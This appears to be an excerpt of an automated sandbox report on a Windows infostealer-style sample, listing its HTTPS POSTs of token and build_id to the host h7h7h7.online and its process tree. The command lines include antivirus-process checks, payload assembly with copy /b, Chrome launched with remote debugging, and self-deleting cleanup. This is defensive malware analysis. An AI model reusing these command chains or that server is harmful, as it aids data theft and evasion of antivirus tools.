                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----iekxl6fct00rqi5fkny5
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 453
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:56 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 69 65 6b 78 6c 36 66 63 74 30 30 72 71 69 35 66 6b 6e 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 69 65 6b 78 6c 36 66 63 74 30 30 72 71 69 35 66 6b 6e 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 69 65 6b 78 6c 36 66 63 74 30 30 72 71 69 35 66 6b 6e 79 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------iekxl6fct00rqi5fkny5Content-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------iekxl6fct00rqi5fkny5Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------iekxl6fct00rqi5fkny5Cont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:56 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      27192.168.2.449839116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:34:01 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----jeuasriwlny58q1n7g4o
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:34:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 6a 65 75 61 73 72 69 77 6c 6e 79 35 38 71 31 6e 37 67 34 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 75 61 73 72 69 77 6c 6e 79 35 38 71 31 6e 37 67 34 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 75 61 73 72 69 77 6c 6e 79 35 38 71 31 6e 37 67 34 6f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------jeuasriwlny58q1n7g4oContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------jeuasriwlny58q1n7g4oContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------jeuasriwlny58q1n7g4oCont
                                                                                                                                                                                                                                                                      2024-12-31 20:34:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:34:01 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:34:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      28192.168.2.449846116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:34:02 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----vkxlx4wbiwl6fusjm7ym
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:34:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 76 6b 78 6c 78 34 77 62 69 77 6c 36 66 75 73 6a 6d 37 79 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 76 6b 78 6c 78 34 77 62 69 77 6c 36 66 75 73 6a 6d 37 79 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 76 6b 78 6c 78 34 77 62 69 77 6c 36 66 75 73 6a 6d 37 79 6d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------vkxlx4wbiwl6fusjm7ymContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------vkxlx4wbiwl6fusjm7ymContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------vkxlx4wbiwl6fusjm7ymCont
                                                                                                                                                                                                                                                                      2024-12-31 20:34:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:34:03 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:34:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                      Start time:15:32:59
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\CenteredDealing.exe"
                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                      File size:1'203'969 bytes
                                                                                                                                                                                                                                                                      MD5 hash:228E734F246564BB255B68D51BD6D31E
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                                      Start time:15:33:00
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd
                                                                                                                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                      Start time:15:33:00
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                      Start time:15:33:02
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                                                                                                                      Imagebase:0xf50000
                                                                                                                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                      Start time:15:33:02
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                                      Start time:15:33:02
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                                                                                                                      Imagebase:0xf50000
                                                                                                                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                                      Start time:15:33:02
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                                      Start time:15:33:03
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:cmd /c md 208639
                                                                                                                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                      Start time:15:33:03
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:extrac32 /Y /E Dodge
                                                                                                                                                                                                                                                                      Imagebase:0xf40000
                                                                                                                                                                                                                                                                      File size:29'184 bytes
                                                                                                                                                                                                                                                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                      Start time:15:33:03
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:findstr /V "Borough" Architecture
                                                                                                                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                                      Start time:15:33:03
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com
                                                                                                                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                                      Start time:15:33:03
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d
                                                                                                                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                                      Start time:15:33:03
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:Rip.com d
                                                                                                                                                                                                                                                                      Imagebase:0x8f0000
                                                                                                                                                                                                                                                                      File size:947'288 bytes
                                                                                                                                                                                                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                                      Start time:15:33:03
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                      Imagebase:0xa20000
                                                                                                                                                                                                                                                                      File size:28'160 bytes
                                                                                                                                                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                      Start time:15:33:29
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                                      Start time:15:33:30
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2608 --field-trial-handle=2480,i,18006708622836409886,5540155705252111612,262144 /prefetch:8
                                                                                                                                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                                      Start time:15:34:02
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8y5fk" & exit
                                                                                                                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                      Start time:15:34:02
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                                      Start time:15:34:02
                                                                                                                                                                                                                                                                      Start date:31/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:timeout /t 10
                                                                                                                                                                                                                                                                      Imagebase:0xba0000
                                                                                                                                                                                                                                                                      File size:25'088 bytes
                                                                                                                                                                                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                        Execution Coverage:18.6%
                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                        Signature Coverage:20.7%
                                                                                                                                                                                                                                                                        Total number of Nodes:1525
                                                                                                                                                                                                                                                                        Total number of Limit Nodes:33
